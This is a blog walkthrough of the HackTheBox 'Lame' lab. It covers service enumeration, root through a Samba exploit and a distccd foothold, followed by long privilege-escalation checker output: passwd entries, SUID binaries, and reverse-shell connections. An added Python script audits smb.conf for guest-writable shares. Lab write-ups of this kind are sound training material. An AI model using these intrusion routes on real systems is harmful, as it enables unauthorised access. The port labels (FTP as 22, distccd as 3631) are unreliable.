NeilSec: Security Learning Blog

Pentesting, infosec, hacking, learning.


HackTheBox: Lame – Walkthrough

2018-09-10 by Neil

Initial Enumeration

Quick SYN scan:

Wider and deeper scan:

A quick note on the scans: I generally do basic nmap scans and then use unicornscan for wider port scans because it’s so much quicker, especially with UDP. However, the HackTheBox VPN appears to interfere with that. So I’ve been amending my nmap scans with the T4 timing and --max-retries, which seems to be a reasonable alternative. The -p- means ports 0-65535. Without the other settings I’ve found all-ports scans to take a ridiculously long time. Unfortunately it still doesn’t make all-ports UDP scans quick enough, so I tend to set one running and leave it whilst working, and if it hits anything, I’ll report on it later.

Initial Scans Summary

An Ubuntu box running: FTP, SSH, SAMBA and something called distccd.

Taking them in turn:

22/FTP

Anonymous access allowed but no permissions to create folders or upload files.

It’s running vsftpd 2.3.4, which has a well-known backdoor that got into the supply chain. This was annoying as I’ve been waiting to see this vulnerability for ages, so I was a bit excited to see this version show up. However, trying the Metasploit module… turns out it doesn’t work. It completes the attempt but won’t create a session. Shame. I won’t bother with screenshots of this not working.

139 & 445 / SMB

It’s running SAMBA 3.0.20

enum4linux -A gives a lot of info, amongst which is the following share info:

The share “tmp” is mappable and listable so we should be able to log onto that with a null session:

Not only that but we can also upload a file. The directories are not listable. But they might well point to a user called “makis”.
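A defender's check for the finding above, a share that accepts a null session and allows uploads: this added example (not from the original post or from the Samba project) parses smb.conf text and reports shares that are guest-accessible, rating the writable ones highest. Both sample configurations are constructed for illustration, and the scratch-directory list and severity labels are assumptions of the example.

```python
"""Report smb.conf shares that accept guest (null-session) access."""

TRUE_WORDS = {"yes", "true", "1"}
FALSE_WORDS = {"no", "false", "0"}
# Assumption of this example: directories treated as shared scratch space.
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Constructed sample modelled on the finding above; not the target's real file.
WEAK_CONF = """
[global]
    workgroup = WORKGROUP
    map to guest = bad user
    ; shares must opt in to guest access
    guest ok = no

[tmp]
    comment = scratch space
    path = /tmp
    read only = no
    guest ok = yes

[docs]
    path = /srv/docs
    public = yes

[opt]
    path = /opt
"""

# Constructed corrected version: no guest mapping, dedicated path, named users.
HARDENED_CONF = """
[global]
    workgroup = WORKGROUP
    map to guest = never

[scratch]
    path = /srv/samba/scratch
    read only = no
    guest ok = no
    valid users = @builders
"""


def parse_smb_conf(text):
    """Return {section: {param: value}} with normalised section/param names."""
    sections, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):            # smb.conf line continuation
            pending = line[:-1]
            continue
        if not line or line[0] in "#;":    # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            name, value = line.split("=", 1)
            # Samba ignores case and whitespace inside parameter names.
            sections[current]["".join(name.lower().split())] = value.strip()
    return sections


def as_bool(value, default):
    word = value.strip().lower()
    return True if word in TRUE_WORDS else False if word in FALSE_WORDS else default


def guest_ok(share, global_):
    """'guest ok' and its synonym 'public'; share setting wins over [global]."""
    for scope in (share, global_):
        for name in ("guestok", "public"):
            if name in scope:
                return as_bool(scope[name], False)
    return False                            # Samba default: guest ok = no


def is_writable(share, global_):
    """'read only' and its inverted synonyms; share setting wins over [global]."""
    for scope in (share, global_):
        if "readonly" in scope:
            return not as_bool(scope["readonly"], True)
        for name in ("writable", "writeable", "writeok"):
            if name in scope:
                return as_bool(scope[name], False)
    return False                            # Samba default: read only = yes


def audit(text):
    """List guest-accessible shares; guest + writable is rated 'high'."""
    conf = parse_smb_conf(text)
    global_ = conf.get("global", {})
    findings = []
    for name, share in conf.items():
        if name == "global" or not guest_ok(share, global_):
            continue
        path = share.get("path", "")
        findings.append({
            "share": name,
            "path": path,
            "severity": "high" if is_writable(share, global_) else "info",
            "scratch_path": any(path == d or path.startswith(d + "/")
                                for d in SCRATCH_DIRS),
        })
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(conf))
```

The check reads only per-share and `[global]` settings; it does not evaluate `write list`, `valid users` or filesystem permissions, which also decide what a guest can do.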

Exploit and root shell

So some progress but nothing likely to result in a shell. Let’s see if the Samba version is vulnerable:

Looks like there is a Metasploit exploit available so let’s fire that up and see if we can use that:

This gets a root shell so we can collect the root token and it turns out there was a user called “makis” as suspected:

Additional Method

Having rooted this I checked out HTB’s official write-up where it states that the SAMBA exploit is the only route in. This isn’t correct.

Remember nmap also found:

3631/distccd

distccd, according to my search, “is a tool for speeding up compilation of source code by using distributed computing over a computer network.”

Turns out there is an MSF exploit for that as well:

This one isn’t a straight root shell but gets us in on the daemon user. This user can cat the user.txt and even enter root’s home directory but cannot cat the root.txt. So it needs escalating.

Seeing as we’re going to be doing more than just listing files with this shell, it’s worth upgrading to a tty shell:

After a quick search I find the test.txt file I uploaded using the null SAMBA session in the /tmp directory:

That makes for a very nice way of moving files to and from this box as I can mount it using Kali’s graphical File app and copy and paste my whole PrivEsc tools folder in at once:

Running linuxprivchecker.py:

=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
    Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008
[+] Hostname
    lame
[+] Operating System
    _                  _       _ _        _     _      ____
    _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
    | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
    | | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/
    |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
    |_|
    Warning: Never expose this VM to an untrusted network!
    Contact: msfdev[at]metasploit.com
    Login with msfadmin/msfadmin to get started
[*] GETTING NETWORKING INFO...
[+] Interfaces
    eth0      Link encap:Ethernet  HWaddr 00:50:56:a4:55:32
    inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
    inet6 addr: dead:beef::250:56ff:fea4:5532/64 Scope:Global
    inet6 addr: fe80::250:56ff:fea4:5532/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
    RX packets:635226 errors:0 dropped:0 overruns:0 frame:0
    TX packets:39131 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:121485252 (115.8 MB)  TX bytes:5874487 (5.6 MB)
    Interrupt:19 Base address:0x2000
    lo        Link encap:Local Loopback
    inet addr:127.0.0.1  Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING  MTU:16436  Metric:1
    RX packets:4839 errors:0 dropped:0 overruns:0 frame:0
    TX packets:4839 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:2379609 (2.2 MB)  TX bytes:2379609 (2.2 MB)
[+] Netstat
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:54195           0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -
    tcp        0      0 10.10.10.3:53           0.0.0.0:*               LISTEN      -
    tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:46645           0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:40953           0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -
    tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:57115           0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -
    tcp        0      0 10.10.10.3:445          10.10.14.19:39956       ESTABLISHED -
    tcp        0      0 10.10.10.3:56809        10.10.14.19:4444        ESTABLISHED 9900/telnet
    tcp        0      0 10.10.10.3:39843        10.10.14.19:4444        ESTABLISHED -
    tcp        0      0 10.10.10.3:39844        10.10.14.19:4444        ESTABLISHED -
    tcp        0   1113 10.10.10.3:56810        10.10.14.19:4444        ESTABLISHED 9903/telnet
    tcp6       0      0 :::2121                 :::*                    LISTEN      -
    tcp6       0      0 :::3632                 :::*                    LISTEN      -
    tcp6       0      0 :::53                   :::*                    LISTEN      -
    tcp6       0      0 :::22                   :::*                    LISTEN      -
    tcp6       0      0 :::5432                 :::*                    LISTEN      -
    tcp6       0      0 ::1:953                 :::*                    LISTEN      -
    udp        0      0 0.0.0.0:2049            0.0.0.0:*                           -
    udp        0      0 0.0.0.0:53124           0.0.0.0:*                           -
    udp        0      0 10.10.10.3:137          0.0.0.0:*                           -
    udp        0      0 0.0.0.0:137             0.0.0.0:*                           -
    udp        0      0 10.10.10.3:138          0.0.0.0:*                           -
    udp        0      0 0.0.0.0:138             0.0.0.0:*                           -
    udp        0      0 127.0.0.1:38291         127.0.0.1:38291         ESTABLISHED -
    udp        0      0 127.0.0.1:161           0.0.0.0:*                           -
    udp        0      0 10.10.10.3:53           0.0.0.0:*                           -
    udp        0      0 127.0.0.1:53            0.0.0.0:*                           -
    udp        0      0 0.0.0.0:69              0.0.0.0:*                           -
    udp        0      0 0.0.0.0:43590           0.0.0.0:*                           -
    udp        0      0 127.0.0.1:34249         0.0.0.0:*                           -
    udp        0      0 0.0.0.0:52684           0.0.0.0:*                           -
    udp        0      0 0.0.0.0:50141           0.0.0.0:*                           -
    udp        0      0 0.0.0.0:111             0.0.0.0:*                           -
    udp        0      0 0.0.0.0:1013            0.0.0.0:*                           -
    udp6       0      0 :::42407                :::*                                -
    udp6       0      0 :::53                   :::*                                -
[+] Route
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    10.10.10.0      *               255.255.255.0   U     0      0        0 eth0
    default         10.10.10.2      0.0.0.0         UG    100    0        0 eth0
[*] GETTING FILESYSTEM INFO...
[+] Mount results
    /dev/mapper/metasploitable-root on / type ext3 (rw,relatime,errors=remount-ro)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    /sys on /sys type sysfs (rw,noexec,nosuid,nodev)
    varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
    varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
    udev on /dev type tmpfs (rw,mode=0755)
    devshm on /dev/shm type tmpfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    /dev/sda1 on /boot type ext3 (rw,relatime)
    securityfs on /sys/kernel/security type securityfs (rw)
    rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
    nfsd on /proc/fs/nfsd type nfsd (rw)
[+] fstab entries
    # /etc/fstab: static file system information.
    #
    # <file system> <mount point>   <type>  <options>       <dump>  <pass>
    proc            /proc           proc    defaults        0       0
    # /dev/mapper/metasploitabale-root
    UUID=59bd36ce-2d78-44fe-843f-a4ca5fcafad1 /               ext3    relatime,errors=remount-ro 0       1
    /dev/sda1 /boot           ext3    relatime        0       2
    /dev/scd0       /media/cdrom0   udf,iso9660 user,noauto,exec,utf8 0       0
    /dev/fd0        /media/floppy0  auto    rw,user,noauto,exec,utf8 0       0
[+] Scheduled cron jobs
    -rw-r--r-- 1 root root  724 Apr  8  2008 /etc/crontab
    /etc/cron.d:
    total 20
    drwxr-xr-x  2 root root 4096 May 14  2012 .
    drwxr-xr-x 95 root root 4096 Sep 10 22:59 ..
    -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
    -rw-r--r--  1 root root  492 Jan  6  2010 php5
    -rw-r--r--  1 root root 1323 Mar 31  2008 postgresql-common
    /etc/cron.daily:
    total 60
    drwxr-xr-x  2 root root 4096 Apr 28  2010 .
    drwxr-xr-x 95 root root 4096 Sep 10 22:59 ..
    -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
    -rwxr-xr-x  1 root root  633 Feb  1  2008 apache2
    -rwxr-xr-x  1 root root 7441 Apr 22  2008 apt
    -rwxr-xr-x  1 root root  314 Apr  4  2008 aptitude
    -rwxr-xr-x  1 root root  502 Dec 12  2007 bsdmainutils
    -rwxr-xr-x  1 root root   89 Jun 19  2006 logrotate
    -rwxr-xr-x  1 root root  954 Mar 12  2008 man-db
    -rwxr-xr-x  1 root root  183 Mar  8  2008 mlocate
    -rwxr-xr-x  1 root root  383 Apr 28  2010 samba
    -rwxr-xr-x  1 root root 3295 Apr  8  2008 standard
    -rwxr-xr-x  1 root root 1309 Nov 23  2007 sysklogd
    -rwxr-xr-x  1 root root  477 Dec  7  2008 tomcat55
    /etc/cron.hourly:
    total 12
    drwxr-xr-x  2 root root 4096 Mar 16  2010 .
    drwxr-xr-x 95 root root 4096 Sep 10 22:59 ..
    -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
    /etc/cron.monthly:
    total 20
    drwxr-xr-x  2 root root 4096 Apr 28  2010 .
    drwxr-xr-x 95 root root 4096 Sep 10 22:59 ..
    -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
    -rwxr-xr-x  1 root root  664 Feb 20  2008 proftpd
    -rwxr-xr-x  1 root root  129 Apr  8  2008 standard
    /etc/cron.weekly:
    total 24
    drwxr-xr-x  2 root root 4096 Mar 16  2010 .
    drwxr-xr-x 95 root root 4096 Sep 10 22:59 ..
    -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
    -rwxr-xr-x  1 root root  528 Mar 12  2008 man-db
    -rwxr-xr-x  1 root root 2522 Jan 28  2008 popularity-contest
    -rwxr-xr-x  1 root root 1220 Nov 23  2007 sysklogd
[+] Writable cron dirs

[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
    08:34:19 up  9:34,  1 user,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
    root     pts/0    :0.0             23:00    9:34   0.00s  0.00s -bash
[+] Sudoers (privileged)
[+] All users
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    dhcp:x:101:102::/nonexistent:/bin/false
    syslog:x:102:103::/home/syslog:/bin/false
    klog:x:103:104::/home/klog:/bin/false
    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
    bind:x:105:113::/var/cache/bind:/bin/false
    postfix:x:106:115::/var/spool/postfix:/bin/false
    ftp:x:107:65534::/home/ftp:/bin/false
    postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
    tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
    distccd:x:111:65534::/:/bin/false
    service:x:1002:1002:,,,:/home/service:/bin/bash
    telnetd:x:112:120::/nonexistent:/bin/false
    proftpd:x:113:65534::/var/run/proftpd:/bin/false
    statd:x:114:65534::/var/lib/nfs:/bin/false
    snmp:x:115:65534::/var/lib/snmp:/bin/false
    makis:x:1003:1003::/home/makis:/bin/sh
[+] Current User ID
    uid=1(daemon) gid=1(daemon) groups=1(daemon)
[+] Super Users Found:
    root
[+] Environment
    _DISTCC_SAFEGUARD=1
    TERM=linux
    QUIET=no
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    _=/usr/bin/env
    runlevel=2
    RUNLEVEL=2
    UPSTART_EVENT=runlevel
    PWD=/tmp/PrivescTools
    VERBOSE=no
    previous=N
    PREVLEVEL=N
    SHLVL=7
    UPSTART_JOB=rc2
    UPSTART_JOB_ID=5
[+] Current User
    daemon
[+] Root and current user history (depends on privs)
    lrwxrwxrwx 1 root root 9 May 14  2012 /root/.bash_history -> /dev/null
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
    drwxrwxrwt 2 root root 40 Sep 10 22:59 /dev/shm
    drwxrwxrwt 3 root root 60 Sep 10 23:00 /var/lock
    drwx-wx-wt 2 root root 4096 Mar 14  2017 /var/lib/php5
    drwxrwxrwt 2 root root 4096 May 20  2012 /var/tmp
    drwxrwxrwt 7 root root 4096 Sep 11 08:31 /tmp
    drwxrwxrwt 2 root root 4096 Sep 10 22:59 /tmp/.ICE-unix
    drwxrwxrwt 2 root root 4096 Sep 10 23:00 /tmp/.X11-unix
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
[+] Checking if root's home folder is accessible
    /root:
    total 80K
    drwxr-xr-x 13 root root 4.0K Sep 10 23:00 .
    drwxr-xr-x 21 root root 4.0K May 20  2012 ..
    -rw-------  1 root root  373 Sep 10 23:00 .Xauthority
    lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
    -rw-r--r--  1 root root 2.2K Oct 20  2007 .bashrc
    drwx------  3 root root 4.0K May 20  2012 .config
    drwx------  2 root root 4.0K May 20  2012 .filezilla
    drwxr-xr-x  5 root root 4.0K Sep 10 23:00 .fluxbox
    drwx------  2 root root 4.0K May 20  2012 .gconf
    drwx------  2 root root 4.0K May 20  2012 .gconfd
    drwxr-xr-x  2 root root 4.0K May 20  2012 .gstreamer-0.10
    drwx------  4 root root 4.0K May 20  2012 .mozilla
    -rw-r--r--  1 root root  141 Oct 20  2007 .profile
    drwx------  5 root root 4.0K May 20  2012 .purple
    -rwx------  1 root root    4 May 20  2012 .rhosts
    drwxr-xr-x  2 root root 4.0K May 20  2012 .ssh
    drwx------  2 root root 4.0K Sep 10 23:00 .vnc
    drwxr-xr-x  2 root root 4.0K May 20  2012 Desktop
    -rwx------  1 root root  401 May 20  2012 reset_logs.sh
    -rw-------  1 root root   33 Mar 14  2017 root.txt
    -rw-r--r--  1 root root  118 Sep 10 23:00 vnc.log
    /root/.fluxbox:
    total 52K
    drwxr-xr-x  5 root root 4.0K Sep 10 23:00 .
    drwxr-xr-x 13 root root 4.0K Sep 10 23:00 ..
    -rw-r--r--  1 root root   70 May 20  2012 apps
    drwxr-xr-x  2 root root 4.0K May 20  2012 backgrounds
    -rw-r--r--  1 root root  314 May 20  2012 init
    -rw-r--r--  1 root root 2.8K May 20  2012 keys
    -rw-r--r--  1 root root  142 Sep 10 23:00 lastwallpaper
    -rw-r--r--  1 root root   66 May 20  2012 menu
    -rw-r--r--  1 root root   89 May 20  2012 overlay
    drwxr-xr-x  2 root root 4.0K May 20  2012 pixmaps
    -rw-r--r--  1 root root  504 May 20  2012 startup
    drwxr-xr-x  2 root root 4.0K May 20  2012 styles
    -rw-r--r--  1 root root  168 May 20  2012 windowmenu
    /root/.fluxbox/backgrounds:
    total 8.0K
    drwxr-xr-x 2 root root 4.0K May 20  2012 .
    drwxr-xr-x 5 root root 4.0K Sep 10 23:00 ..
    /root/.fluxbox/pixmaps:
    total 8.0K
    drwxr-xr-x 2 root root 4.0K May 20  2012 .
    drwxr-xr-x 5 root root 4.0K Sep 10 23:00 ..
    /root/.fluxbox/styles:
    total 8.0K
    drwxr-xr-x 2 root root 4.0K May 20  2012 .
    drwxr-xr-x 5 root root 4.0K Sep 10 23:00 ..
    /root/.gstreamer-0.10:
    total 16K
    drwxr-xr-x  2 root root 4.0K May 20  2012 .
    drwxr-xr-x 13 root root 4.0K Sep 10 23:00 ..
    -rw-------  1 root root 7.4K May 20  2012 registry.i486.xml
    /root/.ssh:
    total 16K
    drwxr-xr-x  2 root root 4.0K May 20  2012 .
    drwxr-xr-x 13 root root 4.0K Sep 10 23:00 ..
    -rw-r--r--  1 root root  405 May 17  2010 authorized_keys
    -rw-r--r--  1 root root  442 May 20  2012 known_hosts
    /root/Desktop:
    total 8.0K
    drwxr-xr-x  2 root root 4.0K May 20  2012 .
    drwxr-xr-x 13 root root 4.0K Sep 10 23:00 ..
[+] SUID/SGID Files and Directories
    -rwsr-xr-x 1 root root 63584 Apr 14  2008 /bin/umount
    -rwsr-xr-- 1 root fuse 20056 Feb 26  2008 /bin/fusermount
    -rwsr-xr-x 1 root root 25540 Apr  2  2008 /bin/su
    -rwsr-xr-x 1 root root 81368 Apr 14  2008 /bin/mount
    -rwsr-xr-x 1 root root 30856 Dec 10  2007 /bin/ping
    -rwsr-xr-x 1 root root 26684 Dec 10  2007 /bin/ping6
    -rwsr-xr-x 1 root root 65520 Dec  2  2008 /sbin/mount.nfs
    -rwxr-sr-x 1 root shadow 19584 Apr  9  2008 /sbin/unix_chkpwd
    -rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
    drwxrwsr-x 2 root src 4096 Apr 15  2008 /usr/src
    -rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudoedit
    -rwxr-sr-x 1 root utmp 3192 Apr 22  2008 /usr/bin/Eterm
    -rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
    -rwxr-sr-x 1 root tty 8192 Dec 12  2007 /usr/bin/bsd-write
    -rwsr-xr-x 1 root root 8524 Nov 22  2007 /usr/bin/netkit-rsh
    -rwxr-sr-x 1 root ssh 76580 Apr  6  2008 /usr/bin/ssh-agent
    -rwsr-xr-x 1 root root 37360 Apr  2  2008 /usr/bin/gpasswd
    -rwxr-sr-x 1 root mlocate 30508 Mar  8  2008 /usr/bin/mlocate
    -rwxr-sr-x 1 root crontab 26928 Apr  8  2008 /usr/bin/crontab
    -rwsr-xr-x 1 root root 12296 Dec 10  2007 /usr/bin/traceroute6.iputils
    -rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudo
    -rwsr-xr-x 1 root root 12020 Nov 22  2007 /usr/bin/netkit-rlogin
    -rwxr-sr-x 1 root shadow 37904 Apr  2  2008 /usr/bin/chage
    -rwxr-sr-x 1 root utmp 308228 Oct 23  2007 /usr/bin/screen
    -rwxr-sr-x 1 root shadow 16424 Apr  2  2008 /usr/bin/expiry
    -rwsr-xr-x 1 root root 11048 Dec 10  2007 /usr/bin/arping
    -rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
    -rwxr-sr-x 1 root utmp 306996 Jan  2  2009 /usr/bin/xterm
    -rwsr-xr-x 1 root root 19144 Apr  2  2008 /usr/bin/newgrp
    -rwxr-sr-x 1 root tty 9960 Apr 14  2008 /usr/bin/wall
    -rwsr-xr-x 1 root root 28624 Apr  2  2008 /usr/bin/chfn
    -rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
    -rwsr-xr-x 1 root root 23952 Apr  2  2008 /usr/bin/chsh
    -rwsr-xr-x 1 root root 15952 Nov 22  2007 /usr/bin/netkit-rcp
    -rwsr-xr-x 1 root root 29104 Apr  2  2008 /usr/bin/passwd
    -rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr
    -rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
    -r-xr-sr-x 1 root postdrop 10312 Apr 18  2008 /usr/sbin/postqueue
    -r-xr-sr-x 1 root postdrop 10036 Apr 18  2008 /usr/sbin/postdrop
    -rwsr-xr-- 1 root dip 269256 Oct  4  2007 /usr/sbin/pppd
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/fonts
    drwxrwsr-x 7 root staff 4096 Mar 23  2010 /usr/local/share/sgml
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/sgml/stylesheet
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/sgml/declaration
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/sgml/dtd
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/sgml/entities
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/sgml/misc
    drwxrwsr-x 2 root staff 4096 Apr 17  2010 /usr/local/lib/site_ruby/1.8/i486-linux
    drwxrwsr-x 3 root staff 4096 Apr 28  2010 /usr/local/lib/python2.5
    drwxrwsr-x 2 root staff 4096 Apr 28  2010 /usr/local/lib/python2.5/site-packages
    -rwsr-xr-- 1 root telnetd 6040 Dec 17  2006 /usr/lib/telnetlogin
    -rwsr-xr-- 1 root www-data 10276 Mar  9  2010 /usr/lib/apache2/suexec
    -rwsr-xr-x 1 root root 4524 Nov  5  2007 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root 165748 Apr  6  2008 /usr/lib/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 9624 Aug 17  2009 /usr/lib/pt_chown
    drwxr-s--- 2 root dip 4096 Mar 16  2010 /etc/chatscripts
    drwxr-s--- 2 root dip 4096 Mar 16  2010 /etc/ppp/peers
    drwxr-sr-x 2 root bind 4096 Mar 17  2010 /etc/bind
    drwxrwsr-x 2 postgres postgres 100 Sep 10 22:59 /var/run/postgresql
    drwxrwsr-x 2 root mail 4096 Sep 11 06:54 /var/mail
    drwxr-s--- 2 mysql adm 4096 Mar 17  2010 /var/log/mysql
    drwxr-sr-x 2 news news 4096 Mar 16  2010 /var/log/news
    drwxrwsr-x 2 root staff 4096 Apr 15  2008 /var/local
    drwxr-sr-x 44 man root 4096 Sep 11 06:54 /var/cache/man
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/ru.KOI8-R
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/zh_CN
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/fi
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/ko
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/id
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat5
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/pt_BR
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/local
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/hu
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/de
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/ru.UTF-8
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/pt
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/tr
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/fr.UTF-8
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/ru
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/cs
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/pl.UTF-8
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/pl
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/ja
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/es
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/sv
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat3
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat7
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat6
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat1
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/zh_TW
